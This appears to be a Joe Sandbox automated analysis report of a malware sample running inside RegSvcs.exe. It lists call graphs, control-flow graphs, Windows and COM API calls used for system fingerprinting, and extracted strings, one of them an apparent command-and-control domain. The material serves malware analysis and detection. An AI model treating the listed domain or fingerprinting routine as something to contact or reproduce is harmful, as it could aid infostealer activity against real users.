23029->22953 23030->23022 23031->23028 23032->22967 23033->22972 23035 443f26 23036 443f62 23035->23036 23037 443f43 23035->23037 23037->23036 23039 443ab0 LdrInitializeThunk 23037->23039 23039->23036 23040 412762 23045 43a1c0 23040->23045 23042 412768 23043 412777 CoUninitialize 23042->23043 23044 4127a0 23043->23044 23046 43a1ee GetSystemMetrics GetSystemMetrics 23045->23046 23047 43a22b DeleteObject 23046->23047 23049 43a278 SelectObject 23047->23049 23051 43a2f0 SelectObject 23049->23051 23052 43a30d DeleteObject 23051->23052 23054 4118a2 23055 4118ac 23054->23055 23057 4118c6 23054->23057 23055->23057 23058 443ab0 LdrInitializeThunk 23055->23058 23058->23057 23059 441fa0 23060 441fbc 23059->23060 23063 441fde 23059->23063 23060->23063 23069 443ab0 LdrInitializeThunk 23060->23069 23062 4421d1 23063->23062 23064 441f30 RtlAllocateHeap 23063->23064 23065 4420af 23064->23065 23068 4420df 23065->23068 23070 443ab0 LdrInitializeThunk 23065->23070 23067 441f50 RtlFreeHeap 23067->23062 23068->23067 23069->23063 23070->23068 23071 41cee6 23072 41d2b1 23071->23072 23078 41cef4 23071->23078 23080 41d0fa 23071->23080 23073 41e5b0 FreeLibrary FreeLibrary RtlAllocateHeap RtlFreeHeap LdrInitializeThunk 23073->23078 23074 41d6fe 23075 41d6c9 23075->23074 23083 443ab0 LdrInitializeThunk 23075->23083 23076 41d1df 23078->23072 23078->23073 23078->23075 23078->23078 23078->23080 23082 443ab0 LdrInitializeThunk 23078->23082 23080->23076 23081 447050 LdrInitializeThunk 23080->23081 23081->23080 23082->23078 23083->23074 23084 4378ab 23087 418ff0 23084->23087 23086 4378b0 CoSetProxyBlanket 23087->23086 23088 4122aa 23089 4122c0 23088->23089 23094 43ec10 23089->23094 23091 4123a8 23092 43ec10 11 API calls 23091->23092 23093 41259f 23092->23093 23093->23093 23095 43ec40 CoCreateInstance 23094->23095 23097 43efb7 SysAllocString 23095->23097 23098 43f4de 23095->23098 23101 43f094 23097->23101 23100 43f4ee GetVolumeInformationW 23098->23100 23109 43f510 23100->23109 23102 43f4cd SysFreeString 23101->23102 23103 43f09c CoSetProxyBlanket 23101->23103 23102->23098 23104 43f4c3 23103->23104 23105 43f0bc SysAllocString 23103->23105 23104->23102 23107 43f160 23105->23107 23107->23107 23108 43f187 SysAllocString 23107->23108 23112 43f1ab 23108->23112 23109->23091 23109->23109 23110 43f4b5 SysFreeString SysFreeString 23110->23104 23111 43f4a3 23111->23110 23112->23110 23112->23111 23113 43f1ef VariantInit 23112->23113 23115 43f240 23113->23115 23114 43f492 VariantClear 23114->23111 23115->23114 23116 43a9ed 23119 43aac0 23116->23119 23120 43aafd GetObjectW 23119->23120 23122 43abf2 23120->23122 23123 43c672 23127 4453b0 23123->23127 23126 43c6b6 23128 43c68a GetUserDefaultUILanguage 23127->23128 23128->23126 23129 4126b0 CoInitializeSecurity CoInitializeSecurity 23130 4113f8 23131 411459 23130->23131 23134 41147e 23130->23134 23131->23134 23137 443ab0 LdrInitializeThunk 23131->23137 23132 4115e2 23134->23132 23136 443ab0 LdrInitializeThunk 23134->23136 23136->23134 23137->23134 23138 443bfb 23139 443c04 GetForegroundWindow 23138->23139 23140 443c19 23139->23140

                                                                            Executed Functions

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 0 43ec10-43ec3f 1 43ec40-43ec74 0->1 1->1 2 43ec76-43ec9b 1->2 3 43eca0-43ed4a 2->3 3->3 4 43ed50-43ed94 3->4 5 43eda0-43edc5 4->5 5->5 6 43edc7-43ede6 5->6 8 43ee4b-43ee98 6->8 9 43ede8-43edff 6->9 11 43eea0-43eeb4 8->11 10 43ee00-43ee3c 9->10 10->10 12 43ee3e-43ee43 10->12 11->11 13 43eeb6-43ef0f 11->13 12->8 14 43ef10-43ef5a 13->14 14->14 15 43ef5c-43efb1 CoCreateInstance 14->15 16 43efb7-43efeb 15->16 17 43f4de-43f50e call 4453b0 GetVolumeInformationW 15->17 19 43eff0-43f069 16->19 22 43f510-43f514 17->22 23 43f518-43f51a 17->23 19->19 20 43f06b-43f096 SysAllocString 19->20 28 43f4cd-43f4da SysFreeString 20->28 29 43f09c-43f0b6 CoSetProxyBlanket 20->29 22->23 25 43f532-43f539 23->25 26 43f545-43f562 25->26 27 43f53b-43f542 25->27 30 43f570-43f5ba 26->30 27->26 28->17 31 43f4c3-43f4c9 29->31 32 43f0bc-43f0cf 29->32 30->30 33 43f5bc-43f5e9 30->33 31->28 34 43f0d0-43f0e4 32->34 35 43f5f0-43f621 33->35 34->34 36 43f0e6-43f15f SysAllocString 34->36 35->35 37 43f623-43f651 call 4226a0 35->37 38 43f160-43f185 36->38 42 43f660-43f668 37->42 38->38 40 43f187-43f1ad SysAllocString 38->40 45 43f1b3-43f1d5 40->45 46 43f4b5-43f4c1 SysFreeString * 2 40->46 42->42 44 43f66a-43f6a0 42->44 47 43f520-43f52c 44->47 48 43f6a6-43f6ad 44->48 51 43f4ab-43f4b1 45->51 52 43f1db-43f1de 45->52 46->31 47->25 50 43f6b2-43f6b9 47->50 48->47 51->46 52->51 53 43f1e4-43f1e9 52->53 53->51 54 43f1ef-43f23f VariantInit 53->54 55 43f240-43f284 54->55 55->55 56 43f286-43f298 55->56 57 43f29c-43f29e 56->57 58 43f492-43f4a7 VariantClear 57->58 59 43f2a4-43f2aa 57->59 58->51 59->58 60 43f2b0-43f2ba 59->60 62 43f2fd 60->62 63 43f2bc-43f2c1 60->63 64 43f2ff-43f317 call 40b340 62->64 65 43f2dc-43f2e0 63->65 73 43f444-43f455 64->73 74 43f31d-43f327 64->74 67 43f2e2-43f2eb 65->67 68 43f2d0 65->68 71 43f2f2-43f2f6 67->71 72 43f2ed-43f2f0 67->72 70 43f2d1-43f2da 68->70 70->64 70->65 71->70 75 43f2f8-43f2fb 71->75 72->70 77 43f457 73->77 78 43f45c-43f468 73->78 74->73 76 43f32d-43f335 74->76 75->70 79 43f340-43f34a 76->79 77->78 80 43f46a 78->80 81 43f46f-43f48f call 40b370 call 40b350 78->81 82 43f360-43f366 79->82 83 43f34c-43f351 79->83 80->81 81->58 86 43f384-43f390 82->86 87 43f368-43f36b 82->87 85 43f3f0-43f3f6 83->85 93 43f3f8-43f3fe 85->93 90 43f392-43f395 86->90 91 43f40a-43f412 86->91 87->86 89 43f36d-43f382 87->89 89->85 90->91 96 43f397-43f3e3 90->96 94 43f414-43f416 91->94 95 43f418-43f41b 91->95 93->73 98 43f400-43f402 93->98 94->93 100 43f440-43f442 95->100 101 43f41d-43f43e 95->101 96->85 98->79 99 43f408 98->99 99->73 100->85 101->85
                                                                            APIs
                                                                            • CoCreateInstance.OLE32(AEA9A8A3,00000000,00000001,49484FBB,00000000), ref: 0043EFA9
                                                                            • SysAllocString.OLEAUT32(9>), ref: 0043F070
                                                                            • CoSetProxyBlanket.COMBASE(0000BE0E,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0043F0AE
                                                                            • SysAllocString.OLEAUT32(B2ECBC14), ref: 0043F0EB
                                                                            • SysAllocString.OLEAUT32(ED11F301), ref: 0043F18C
                                                                            • VariantInit.OLEAUT32(?), ref: 0043F1FC
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                            Similarity
                                                                            • API ID: AllocString$BlanketCreateInitInstanceProxyVariant
                                                                            • String ID: .s7~$0000$05$2s7~$9>$C$\
                                                                            • API String ID: 65563702-157929154
                                                                            • Opcode ID: f679a52da9129afa615ef7267d1bf0b31bc0b1870f37a6ffeadbf1243c1582fe
                                                                            • Instruction ID: 5bd62fa1782f64a5b906d5cad8eaf309934615f36ddd37a47e06fca9717baf20
                                                                            • Opcode Fuzzy Hash: f679a52da9129afa615ef7267d1bf0b31bc0b1870f37a6ffeadbf1243c1582fe
                                                                            • Instruction Fuzzy Hash: 82523375A183419FD714CF28C8817ABBBE1EBD9310F18892EE995C7391D738D806CB96

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 228 412762-412793 call 43a1c0 call 40ca90 CoUninitialize 233 4127a0-412810 228->233 233->233 234 412812-412821 233->234 235 412830-412844 234->235 235->235 236 412846-4128a6 235->236 237 4128b0-4128e9 236->237 237->237 238 4128eb-4128fc 237->238 239 41291b-412923 238->239 240 4128fe-41290f 238->240 241 412925-412926 239->241 242 41293b-412945 239->242 243 412910-412919 240->243 244 412930-412939 241->244 245 412947-41294b 242->245 246 41295b-412963 242->246 243->239 243->243 244->242 244->244 247 412950-412959 245->247 248 412965-412966 246->248 249 41297b-412985 246->249 247->246 247->247 250 412970-412979 248->250 251 412987-41298b 249->251 252 41299b-4129a7 249->252 250->249 250->250 253 412990-412999 251->253 254 4129c1-412adf 252->254 255 4129a9-4129ab 252->255 253->252 253->253 256 412ae0-412b24 254->256 257 4129b0-4129bd 255->257 256->256 258 412b26-412b3f 256->258 257->257 259 4129bf 257->259 260 412b40-412b54 258->260 259->254 260->260 261 412b56-412b7d call 40f280 260->261 263 412b82-412b9c 261->263
                                                                            APIs
                                                                              • Part of subcall function 0043A1C0: GetSystemMetrics.USER32 ref: 0043A200
                                                                              • Part of subcall function 0043A1C0: GetSystemMetrics.USER32 ref: 0043A210
                                                                              • Part of subcall function 0043A1C0: DeleteObject.GDI32 ref: 0043A253
                                                                              • Part of subcall function 0043A1C0: SelectObject.GDI32 ref: 0043A2A3
                                                                              • Part of subcall function 0043A1C0: SelectObject.GDI32 ref: 0043A2FA
                                                                              • Part of subcall function 0043A1C0: DeleteObject.GDI32 ref: 0043A328
                                                                            • CoUninitialize.COMBASE ref: 00412777
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                            Similarity
                                                                            • API ID: Object$DeleteMetricsSelectSystem$Uninitialize
                                                                            • String ID: 'bPa$GDVL$H$HLRz$JXLr$MNZb$Y@UT$a|}r$es$toppyneedus.biz$~9o
                                                                            • API String ID: 1556769885-3369938970
                                                                            • Opcode ID: 74399e4d4964ef56206682ed68936d729a64e540827de97b0792b0f078d907e5
                                                                            • Instruction ID: 3f5db8edab9c61520f541d163cbfbf0d3d3ee8140705553f7d56a302672ecd04
                                                                            • Opcode Fuzzy Hash: 74399e4d4964ef56206682ed68936d729a64e540827de97b0792b0f078d907e5
                                                                            • Instruction Fuzzy Hash: 3DA125B450C3D18BD7248F2985A43EBBFE1EF92300F184A6DC4D59B392D7794446CB9A

                                                                            Control-flow Graph

                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                            Similarity
                                                                            • API ID: Object$DeleteMetricsSelectSystem
                                                                            • String ID:
                                                                            • API String ID: 3911056724-3916222277
                                                                            • Opcode ID: 4a9724fb9ddcb8cc8764f3d52301826d8afc170a9f991add1763296750271f49
                                                                            • Instruction ID: d8ef0c89c88b37a59d4e6ea661248bfd4e3723719d43e6beb7202de68050ffce
                                                                            • Opcode Fuzzy Hash: 4a9724fb9ddcb8cc8764f3d52301826d8afc170a9f991add1763296750271f49
                                                                            • Instruction Fuzzy Hash: D68162B05097808FE720DF65D54878BFBF0BB85348F00892EE4999B254D7B95848CF9B

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 277 43388c-4338a3 278 4338b0-4338c4 277->278 278->278 279 4338c6-4338cd 278->279 280 4338eb-433cfa 279->280 281 4338cf-4338d3 279->281 284 433d00-433d26 280->284 283 4338e0-4338e9 281->283 283->280 283->283 284->284 285 433d28-433d2f 284->285 286 433d31-433d35 285->286 287 433d4b-433d57 285->287 288 433d40-433d49 286->288 289 433d71-433d8f call 4453b0 287->289 290 433d59-433d5b 287->290 288->287 288->288 294 433d94-433dbf GetPhysicallyInstalledSystemMemory 289->294 291 433d60-433d6d 290->291 291->291 293 433d6f 291->293 293->289 295 433dc0-433e01 294->295 295->295 296 433e03-433e3f call 4226a0 295->296 299 433e40-433e59 296->299 299->299 300 433e5b-433e62 299->300 301 433e64-433e68 300->301 302 433e7b-433e83 300->302 303 433e70-433e79 301->303 304 433e85-433e86 302->304 305 433e9b-433ea5 302->305 303->302 303->303 306 433e90-433e99 304->306 307 433ea7-433eab 305->307 308 433ebb-433f0a 305->308 306->305 306->306 309 433eb0-433eb9 307->309 310 433f10-433f43 308->310 309->308 309->309 310->310 311 433f45-433f4c 310->311 312 433f6b-433f78 311->312 313 433f4e-433f52 311->313 314 433f9b-43401e 312->314 315 433f7a-433f81 312->315 316 433f60-433f69 313->316 317 433f90-433f99 315->317 316->312 316->316 317->314 317->317
                                                                            APIs
                                                                            • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 00433D9C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                            Similarity
                                                                            • API ID: InstalledMemoryPhysicallySystem
                                                                            • String ID: J$X`_c$skV@$skV@
                                                                            • API String ID: 3960555810-2005354828
                                                                            • Opcode ID: a4b45c8b632581b866df3e25f45b228fa2c145eb8ca146f40679d63fb5943e0a
                                                                            • Instruction ID: e81a7228d023d3b4a69c6ffaa03a894231a2fd9ac06063adaae5aedf1b3b955b
                                                                            • Opcode Fuzzy Hash: a4b45c8b632581b866df3e25f45b228fa2c145eb8ca146f40679d63fb5943e0a
                                                                            • Instruction Fuzzy Hash: 1CA1917160C3828BE729CF39846136BBFE09FA7305F18586EE0D587392D7798905CB56

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 463 40ba50-40ba61 call 4432f0 466 40bd97-40bd99 ExitProcess 463->466 467 40ba67-40ba6e call 43be70 463->467 470 40bd92 call 443a30 467->470 471 40ba74-40ba98 GetCurrentProcessId GetCurrentThreadId 467->471 470->466 472 40ba9a-40ba9c 471->472 473 40ba9e-40bbe1 SHGetSpecialFolderPathW GetForegroundWindow 471->473 472->473 475 40bbe3-40bbe6 473->475 476 40bbe8-40bc5f 473->476 477 40bc62-40bc73 475->477 476->477 478 40bc80-40bced 477->478 478->478 479 40bcef-40bd1f call 441f30 478->479 482 40bd20-40bd3c 479->482 483 40bd56-40bd74 call 40cf60 482->483 484 40bd3e-40bd54 482->484 487 40bd80-40bd87 483->487 488 40bd76 call 410c90 483->488 484->482 487->470 490 40bd89-40bd8f call 40b350 487->490 491 40bd7b call 40f250 488->491 490->470 491->487
                                                                            APIs
                                                                            • GetCurrentProcessId.KERNEL32 ref: 0040BA74
                                                                            • GetCurrentThreadId.KERNEL32 ref: 0040BA7E
                                                                            • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 0040BBC4
                                                                            • GetForegroundWindow.USER32 ref: 0040BBD9
                                                                            • ExitProcess.KERNEL32 ref: 0040BD99
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                            Similarity
                                                                            • API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
                                                                            • String ID:
                                                                            • API String ID: 4063528623-0
                                                                            • Opcode ID: e0b40994274a72c21af793b1b145087dbff1999c3c617cf599449e7c0adc542b
                                                                            • Instruction ID: c6d0d95a088bac336b3a14bf38012ddc3ad462f7c77cfc1720424f6e08d96a26
                                                                            • Opcode Fuzzy Hash: e0b40994274a72c21af793b1b145087dbff1999c3c617cf599449e7c0adc542b
                                                                            • Instruction Fuzzy Hash: 17813977A487044FC318DF79CC8535ABAD3AFC4310F0A853EA994DB395EA789C098799

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 495 429f42-429f46 496 429f48-429f4d 495->496 497 429f4f 495->497 498 429f52-429f72 call 40b340 RtlExpandEnvironmentStrings 496->498 497->498 501 429f81-429f90 498->501 502 429f79 498->502 503 429f92-429f9a 501->503 504 429f9c-429f9f 501->504 502->501 505 429fa1-429fd3 call 40b340 503->505 504->505 508 429fe0-42a01f 505->508 508->508 509 42a021-42a02c 508->509 510 42a051-42a062 509->510 511 42a02e-42a033 509->511 513 42a081-42a098 call 447050 510->513 514 42a064-42a067 510->514 512 42a040-42a04f 511->512 512->510 512->512 518 42a373-42a37f call 40b350 513->518 519 42a225-42a22d 513->519 520 42a235-42a24f 513->520 521 42a388 513->521 522 42a38e-42a429 513->522 523 42a09f-42a0a4 513->523 524 42a0ad-42a0b7 513->524 525 42a36d 513->525 515 42a070-42a07f 514->515 515->513 515->515 518->521 519->520 526 42a250-42a260 520->526 521->522 530 42a430-42a47f 522->530 523->524 528 42a0c0 524->528 529 42a0b9-42a0be 524->529 525->518 526->526 532 42a262-42a2df 526->532 534 42a0c7-42a15f call 40b340 528->534 529->534 530->530 531 42a481-42a48e call 426420 530->531 539 42a493-42a496 531->539 536 42a2e0-42a34b 532->536 541 42a160-42a1a6 534->541 536->536 540 42a34d-42a36a call 426030 536->540 544 42a49e-42a4ab call 40b350 539->544 540->525 541->541 543 42a1a8-42a1b4 541->543 546 42a1d1-42a1e2 543->546 547 42a1b6-42a1bf 543->547 554 42a4b0 544->554 550 42a203 546->550 551 42a1e4-42a1ea 546->551 549 42a1c0-42a1cf 547->549 549->546 549->549 555 42a206-42a21e call 447050 550->555 553 42a1f0-42a1ff 551->553 553->553 556 42a201 553->556 558 42a4b6 554->558 555->518 555->519 555->520 555->521 555->525 555->544 555->554 555->558 560 42a4c9-42a4d2 555->560 561 42a4bc-42a4c6 call 40b350 555->561 556->555 558->561 561->560
                                                                            APIs
                                                                            • RtlExpandEnvironmentStrings.NTDLL(00000000,00000000,0000000E,00000000), ref: 00429F67
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                            Similarity
                                                                            • API ID: EnvironmentExpandStrings
                                                                            • String ID: y}$HN$aPz
                                                                            • API String ID: 237503144-931251045
                                                                            • Opcode ID: fedfff6ccaf23c00e99d995cf1c3899f69a2595a8d9b39507aa153b094523d11
                                                                            • Instruction ID: 3d6e7c66f7cc0ffe89aba064b13d3f3f304ca07a6ea66cb67826b42f8b26a17a
                                                                            • Opcode Fuzzy Hash: fedfff6ccaf23c00e99d995cf1c3899f69a2595a8d9b39507aa153b094523d11
                                                                            • Instruction Fuzzy Hash: A4E17CB5E01224CFCB14CF64D8816AABB72FF45314B1A81A9D855AF362E739DC02CF95

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 564 43395b-433cfa call 439b50 call 40b350 570 433d00-433d26 564->570 570->570 571 433d28-433d2f 570->571 572 433d31-433d35 571->572 573 433d4b-433d57 571->573 574 433d40-433d49 572->574 575 433d71-433dbf call 4453b0 GetPhysicallyInstalledSystemMemory 573->575 576 433d59-433d5b 573->576 574->573 574->574 581 433dc0-433e01 575->581 577 433d60-433d6d 576->577 577->577 579 433d6f 577->579 579->575 581->581 582 433e03-433e3f call 4226a0 581->582 585 433e40-433e59 582->585 585->585 586 433e5b-433e62 585->586 587 433e64-433e68 586->587 588 433e7b-433e83 586->588 589 433e70-433e79 587->589 590 433e85-433e86 588->590 591 433e9b-433ea5 588->591 589->588 589->589 592 433e90-433e99 590->592 593 433ea7-433eab 591->593 594 433ebb-433f0a 591->594 592->591 592->592 595 433eb0-433eb9 593->595 596 433f10-433f43 594->596 595->594 595->595 596->596 597 433f45-433f4c 596->597 598 433f6b-433f78 597->598 599 433f4e-433f52 597->599 600 433f9b-43401e 598->600 601 433f7a-433f81 598->601 602 433f60-433f69 599->602 603 433f90-433f99 601->603 602->598 602->602 603->600 603->603
                                                                            APIs
                                                                            • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 00433D9C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                            Similarity
                                                                            • API ID: InstalledMemoryPhysicallySystem
                                                                            • String ID: J$X`_c$skV@
                                                                            • API String ID: 3960555810-3359567207
                                                                            • Opcode ID: a0b8be5ced7b63cb53a376060b22c24f7019e0023a268acdea50515a9a4ed71d
                                                                            • Instruction ID: 035e47239e826f27f534e6416137c7c3ebf3fbab117d3c9b8e46e1cdfad2f34f
                                                                            • Opcode Fuzzy Hash: a0b8be5ced7b63cb53a376060b22c24f7019e0023a268acdea50515a9a4ed71d
                                                                            • Instruction Fuzzy Hash: 3091D27160C3828BE729CF39846136BBFE09FAB305F18586EE4C587392D7398905CB56

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 604 40ca90-40ca9e 605 40cf02 604->605 606 40caa4-40cb08 call 409000 call 40b340 604->606 608 40cf04-40cf10 605->608 612 40cb10-40cb24 606->612 612->612 613 40cb26-40cb54 call 40c360 612->613 616 40cb60-40cbc5 613->616 616->616 617 40cbc7-40cbee call 40c360 616->617 620 40cbf0-40cc04 617->620 620->620 621 40cc06-40cc37 call 40c360 620->621 624 40cc40-40cc5f 621->624 624->624 625 40cc61-40cc6f 624->625 626 40cc70-40ccae 625->626 626->626 627 40ccb0-40ccd9 call 40c360 626->627 630 40cce0-40cd16 627->630 630->630 631 40cd18-40cde6 call 40c660 630->631 634 40cdf0-40ce1c 631->634 634->634 635 40ce1e-40ce26 634->635 636 40ce41-40ce4c 635->636 637 40ce28-40ce2c 635->637 639 40ce71-40ce9f 636->639 640 40ce4e-40ce51 636->640 638 40ce30-40ce3f 637->638 638->636 638->638 642 40cea0-40cec1 639->642 641 40ce60-40ce6f 640->641 641->639 641->641 642->642 643 40cec3-40ced8 call 40fc10 642->643 645 40cedd-40cf00 call 40b350 643->645 645->608
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: %A,C$*qRs$23$2CDE6C0265185D724654FD9A0884370E$yUF@
                                                                            • API String ID: 0-3401900027
                                                                            • Opcode ID: 7bdefcf36309d015c18ce46b43af112fc537c1b5e623236aaa6e7cc0f1a2a40d
                                                                            • Instruction ID: 6042d8d42f8b95c6088e4400987f142d768da2ab63f70eb298ebd0f1098f0102
                                                                            • Opcode Fuzzy Hash: 7bdefcf36309d015c18ce46b43af112fc537c1b5e623236aaa6e7cc0f1a2a40d
                                                                            • Instruction Fuzzy Hash: D7C128B19083508BD714DF74D88166BBBE2EFC2314F144A3DE5E59B391D638C90A8B9A

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 648 445b30-445b41 649 445b50-445b64 648->649 649->649 650 445b66-445b7f 649->650 651 445b80-445bd5 650->651 651->651 652 445bd7-445bdf 651->652 653 445be1-445bef 652->653 654 445c2d-445c36 652->654 655 445bf0-445bf3 653->655 656 445c40-445cad 654->656 658 445bf5-445bf8 655->658 659 445bfc-445c03 655->659 656->656 657 445caf 656->657 660 445cb2-445cc1 657->660 658->655 661 445bfa 658->661 659->654 662 445c05-445c20 call 443ab0 659->662 663 445cd0-445d50 660->663 661->654 666 445c25-445c28 662->666 663->663 665 445d56-445d5d 663->665 667 446003-44600c 665->667 668 445d63-445d86 call 441f30 665->668 666->660 671 445d90-445db7 668->671 671->671 672 445db9-445dd2 671->672 673 445de0-445e05 672->673 673->673 674 445e07-445e13 673->674 675 445e15-445e1b 674->675 676 445e60-445e69 674->676 678 445e20-445e23 675->678 677 445e70-445edd 676->677 677->677 679 445edf-445ee6 677->679 680 445e25-445e28 678->680 681 445e2c-445e33 678->681 683 445eea-445ef0 679->683 680->678 684 445e2a 680->684 681->676 682 445e35-445e51 call 443ab0 681->682 688 445e56-445e5b 682->688 686 445ef6-445ef8 683->686 687 445ffa-446000 call 441f50 683->687 684->676 686->687 689 445efe-445f00 686->689 687->667 688->683 691 445f06-445f0f 689->691 692 445ff3-445ff8 689->692 694 445f11 691->694 695 445f13-445f15 691->695 692->687 694->695 696 445fed 695->696 697 445f1b-445f29 695->697 696->692 698 445f75-445f7a 697->698 699 445f2b-445f35 697->699 698->696 700 445f7c-445f82 698->700 701 445f40-445f58 699->701 702 445f90-445fe1 700->702 701->701 703 445f5a-445f71 701->703 702->702 705 445fe3-445fe9 702->705 703->700 704 445f73 703->704 704->696 705->696
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID: 65W$V_+$V_+$mjkh
                                                                            • API String ID: 2994545307-3447793841
                                                                            • Opcode ID: 8788fcc91d2aabc928657b8f6a254555e90f577f5291a136465f770fae1a41fc
                                                                            • Instruction ID: 215a79a2e85639bcd765fd2aea718205f9cfb5cee2e77218a278173b9c064eb3
                                                                            • Opcode Fuzzy Hash: 8788fcc91d2aabc928657b8f6a254555e90f577f5291a136465f770fae1a41fc
                                                                            • Instruction Fuzzy Hash: 8ED13632B187014BE718CF28D89056BB7E3EFD9310F19C53DE59587296DB78A80A8786

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 735 4100ec-4102cf 736 4102d0-410318 735->736 736->736 737 41031a-41052f 736->737 739 410530-410578 737->739 739->739 740 41057a-410582 739->740 741 410585-410598 740->741
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 50$FwPq$Js$'!
                                                                            • API String ID: 0-2761542065
                                                                            • Opcode ID: cecf62e9b4abfb864a88db18d40b6c2797597131c567bbbdd07bc7a848f1ce4f
                                                                            • Instruction ID: 4e6bf2480f77da9bec1d5c114b64c7ab50299f10efae6194e20d1badb95d899f
                                                                            • Opcode Fuzzy Hash: cecf62e9b4abfb864a88db18d40b6c2797597131c567bbbdd07bc7a848f1ce4f
                                                                            • Instruction Fuzzy Hash: 4EB12EB85113408FE318DF66CA89FA93EB5BB10314F1A82E9D5486F236CB708445CF96
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID: V_+$V_+${rsp
                                                                            • API String ID: 2994545307-2550429205
                                                                            • Opcode ID: 21688b700915ab44ccddca7cdd52f7ef545cca12c5a7280fb822af3c51c1f1c2
                                                                            • Instruction ID: a8d075ee13a02e907279da372650c945f0e7391efac607851ac42c0d504b3f86
                                                                            • Opcode Fuzzy Hash: 21688b700915ab44ccddca7cdd52f7ef545cca12c5a7280fb822af3c51c1f1c2
                                                                            • Instruction Fuzzy Hash: E6C168727083114FD718CF28C89156BB7E2EBC6324F1A863DE8A597395D735DC0A8786
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID: OP_@$vUWB
                                                                            • API String ID: 2994545307-361482620
                                                                            • Opcode ID: 8ab973f7c4cceae847145ad844dd442a7f655e249b21c39301527ead578295a5
                                                                            • Instruction ID: 8880bc083489bd42877745cbd987df871580ae8ac31a24fd3c25772d90adc33e
                                                                            • Opcode Fuzzy Hash: 8ab973f7c4cceae847145ad844dd442a7f655e249b21c39301527ead578295a5
                                                                            • Instruction Fuzzy Hash: A8B1A971B083105BD718DE65ACD163FB3D2EBD5314F69853EE9828B3D2E6389806C299
                                                                            Memory Dump Source
